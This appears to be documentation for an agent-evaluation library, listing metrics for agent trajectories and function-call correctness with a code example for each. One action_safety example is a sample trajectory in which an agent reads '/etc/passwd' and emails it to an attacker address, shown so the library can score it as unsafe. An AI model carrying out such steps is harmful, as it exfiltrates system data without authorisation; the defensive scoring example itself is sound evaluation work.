Agents & Function Calling
11 metrics for evaluating agent trajectories, tool use, reasoning quality, and function call correctness. All run locally via evaluate().
- 7 agent trajectory metrics (continuous 0.0-1.0): task completion, efficiency, tool selection, safety, reasoning
- 4 function calling metrics (binary 0/1): name match, parameter validation, accuracy, exact match
task_completion,action_safety, andreasoning_qualitysupportaugment=True
These metrics evaluate how well an agent performed a task and whether it called the right functions with the right parameters.
from fi.evals import evaluate
result = evaluate(
"task_completion",
output="Booked flight AA123 from SFO to JFK on March 15. Confirmation sent to user.",
context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
print(result.score) # 0.95
Agent Trajectory Metrics
Pass the full agent trajectory (tool calls, intermediate steps, final output) as output, and the task description as context. All return 0.0 to 1.0.
| Metric | What it measures |
|---|---|
task_completion | Whether the agent completed the assigned task |
step_efficiency | Whether the agent reached its goal in minimal steps |
tool_selection_accuracy | Whether the agent selected the correct tools |
trajectory_score | Overall trajectory quality covering tool use, ordering, and progress |
goal_progress | How much progress was made toward the goal |
action_safety | Whether the agent’s actions are safe and authorized |
reasoning_quality | Quality of the agent’s reasoning chain |
task_completion
Whether the agent completed the assigned task. Supports augment=True.
result = evaluate(
"task_completion",
output="Created Jira ticket PROJ-452 'Fix login timeout' assigned to @alice.",
context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.97
step_efficiency
Whether the agent reached its goal in minimal steps without unnecessary detours.
result = evaluate(
"step_efficiency",
output="Step 1: search_users('alice') → found. Step 2: create_ticket(title='Fix login timeout', assignee='alice') → PROJ-452.",
context="User asked: create a Jira ticket for the login timeout bug and assign it to Alice.",
)
# score → 0.92
tool_selection_accuracy
Whether the agent selected the correct tools for the task.
result = evaluate(
"tool_selection_accuracy",
output="Called: [search_flights, book_flight, send_confirmation]",
context="User asked to book a flight and send a confirmation email.",
expected_output="[search_flights, book_flight, send_confirmation]",
)
# score → 1.0
trajectory_score
Overall trajectory quality covering tool use, ordering, and task progress.
result = evaluate(
"trajectory_score",
output="Step 1: search_db('revenue Q4') → $2.3M. Step 2: generate_chart(data) → chart.png. Step 3: send_email(to='cfo', attachment='chart.png').",
context="User asked: pull Q4 revenue, chart it, and email the chart to the CFO.",
)
# score → 0.94
goal_progress
How much progress was made, even if the task wasn’t fully completed. Useful for partial-credit scoring.
result = evaluate(
"goal_progress",
output="Step 1: search_flights('SFO','JFK','2025-03-15') → 3 results. Step 2: agent timed out.",
context="User asked to book the cheapest direct flight from SFO to JFK on March 15.",
)
# score → 0.45
action_safety
Whether the agent’s actions are safe — no destructive operations, data leaks, or unauthorized access. Supports augment=True.
result = evaluate(
"action_safety",
output="Step 1: read_file('/etc/passwd'). Step 2: send_email(to='external@attacker.com', body=contents).",
context="User asked to check system health.",
)
# score → 0.05
reasoning_quality
Quality of the agent’s reasoning chain — logical, well-structured, leads to the correct conclusion. Supports augment=True.
result = evaluate(
"reasoning_quality",
output="Thought: User needs Q4 revenue. I should query the database first. Action: query_db('SELECT SUM(revenue) FROM sales WHERE quarter=Q4') → $2.3M.",
context="User asked: what was our Q4 revenue?",
)
# score → 0.88
Function Calling Metrics
Validate whether the agent called the right function with the right parameters. All are binary (0 or 1). Pass actual and expected function calls as JSON strings.
| Metric | What it checks |
|---|---|
function_name_match | Whether the function name matches (ignores parameters) |
parameter_validation | Whether function parameters match (names and values) |
function_call_accuracy | Overall correctness — function name and parameters together |
function_call_exact_match | Strict exact match — JSON must be identical |
function_name_match
Whether the function name matches. Ignores parameters.
result = evaluate(
"function_name_match",
output='{"name": "get_weather", "arguments": {"city": "NYC"}}',
expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco"}}',
)
# score → 1.0 (name matches, params ignored)
parameter_validation
Whether function parameters match (names and values).
result = evaluate(
"parameter_validation",
output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
expected_output='{"name": "get_weather", "arguments": {"city": "San Francisco", "units": "celsius"}}',
)
# score → 1.0
function_call_accuracy
Overall correctness — function name and parameters together.
result = evaluate(
"function_call_accuracy",
output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
expected_output='{"name": "create_event", "arguments": {"title": "Team Sync", "date": "2025-03-20"}}',
)
# score → 1.0
function_call_exact_match
Strict exact match — JSON must be identical.
result = evaluate(
"function_call_exact_match",
output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 1.0
result = evaluate(
"function_call_exact_match",
output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 3}}',
expected_output='{"name": "search_docs", "arguments": {"query": "refund policy", "top_k": 5}}',
)
# score → 0.0 (top_k differs)
Augmented Evaluation
task_completion, action_safety, and reasoning_quality support augment=True. This runs the local heuristic first, then refines with an LLM.
from fi.evals import evaluate
result = evaluate(
"task_completion",
output="Booked flight AA123. Confirmation #BK-9921 sent to user@email.com.",
context="User asked to book the cheapest direct flight from SFO to JFK on March 15 and email the confirmation.",
model="gemini/gemini-2.5-flash",
augment=True,
)
print(result.metadata["engine"]) # "local+llm"